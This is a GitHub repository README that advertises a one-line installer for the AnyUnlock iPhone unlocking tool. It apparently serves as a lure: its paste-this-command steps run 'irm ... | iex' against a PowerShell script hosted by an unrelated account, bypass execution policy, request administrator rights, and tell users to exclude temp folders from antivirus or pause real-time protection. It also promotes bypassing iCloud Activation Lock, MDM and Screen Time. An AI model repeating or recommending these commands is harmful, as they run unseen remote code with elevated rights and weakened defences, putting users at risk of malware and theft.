Skip to content

ExaGuardTeach/AnyUnlock-Quick-Setup

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

AnyUnlock Quick Setup

All-in-one single-line installer for AnyUnlock — the complete iPhone password unlocker. Removes screen passcodes, Apple ID, iCloud lock, Screen Time, and MDM profiles. One command, no manual downloads.

Install

PowerShell

irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex

Command Prompt (cmd.exe)

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

Windows Terminal

Works from any shell tab. Paste the command matching your current shell and press Enter.


What happens after you run it

  1. A UAC prompt appears — click Yes (USB drivers need admin rights).
  2. The script downloads AnyUnlock + Apple Mobile Device drivers (~350 MB).
  3. iTunes USB drivers install automatically so your PC can communicate with the iPhone.
  4. AnyUnlock opens. Plug in your device with a cable, choose the unlock mode, and follow the on-screen guide.

Unlock Modes

Mode What it does Data preserved?
Screen Passcode Removes 4-digit, 6-digit, Touch ID, Face ID lock No — device wipes
Apple ID Removal Signs out Apple ID without password on activated devices Yes
iCloud Activation Lock Bypasses "This iPhone is locked to owner" screen Limited (no calls/cellular)
Screen Time Removes parental Screen Time passcode Yes — no data loss
MDM Bypass Removes corporate/school MDM profiles and restrictions Yes
iTunes Backup Decrypt Recovers forgotten iTunes backup encryption password N/A (backup file)
SIM Unlock Removes carrier lock (AT&T, T-Mobile, Vodafone, etc.) Yes

Compatibility

Device iOS Version All modes?
iPhone 15 / 16 series iOS 17–18 Passcode, Apple ID, Screen Time, MDM
iPhone 11–14 series iOS 14–18 All modes
iPhone X and older iOS 12–16 All modes including iCloud bypass
iPad (all generations) iPadOS 14–18 Passcode, Apple ID, Screen Time, MDM
iPod Touch iOS 12–15 Passcode, Apple ID

Requirements

  • Windows 10 / 11 (64-bit)
  • PowerShell 5.1+ or CMD
  • USB cable — use the original Apple cable (Lightning or USB-C). Third-party cables frequently lack data pins and will not be detected.
  • ~1 GB free disk space
  • iTunes drivers (the installer handles this automatically)

Troubleshooting

Script does nothing / closes instantly

Execution policy blocking. Use CMD:

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

"irm is not recognized"

Old PowerShell (pre-3.0). Full cmdlet:

Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-Expression

iPhone not detected after plugging in

Most common cause: bad cable. Try these in order:

  1. Use the original Apple cable that came with the phone.
  2. Plug into a USB port directly on the motherboard (back of desktop PC), not a hub or front panel.
  3. On the iPhone, tap Trust when the "Trust This Computer?" dialog appears.
  4. If nothing happens, open Device Manager → check for a yellow triangle under "Portable Devices" or "Universal Serial Bus". Right-click → Update Driver.

"Apple Mobile Device Service" not running

The installer should handle this. If it didn't:

net start "Apple Mobile Device Service"

If the service doesn't exist, re-run the installer — it reinstalls the full Apple driver stack.

Unlock starts but fails halfway

  • Make sure the iPhone has at least 20% battery. Interrupting a firmware flash can brick the device.
  • Disable any VPN or proxy — AnyUnlock needs a direct connection to Apple's verification servers.
  • If stuck in Recovery Mode: hold Volume Down + Power for 10 seconds to force restart, then retry.

"Device is in DFU mode" but I didn't put it there

Some unlock modes require DFU. Follow the on-screen button sequence exactly — the timing is strict:

  • iPhone 8+: Press Volume Up, release. Press Volume Down, release. Hold Side button for 10s. Then hold Side + Volume Down for 5s. Release Side, keep holding Volume Down for 10s.
  • iPhone 7: Hold Power + Volume Down for 10s. Release Power, keep holding Volume Down for 5s.
  • iPhone 6s and older: Hold Home + Power for 10s. Release Power, keep holding Home for 5s.

If the Apple logo appears, you went too far — start over.

Antivirus blocks the download

AnyUnlock touches low-level USB drivers, which triggers some AV heuristics. Add a temporary exclusion for %TEMP% and C:\Program Files\AnyUnlock\, or pause real-time protection during install.

License

MIT — see LICENSE.

About

AnyUnlock - All-in-one iPhone password unlocker for passcode and Apple ID. Comprehensive guide with setup instructions, feature highlights, and system requirements.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors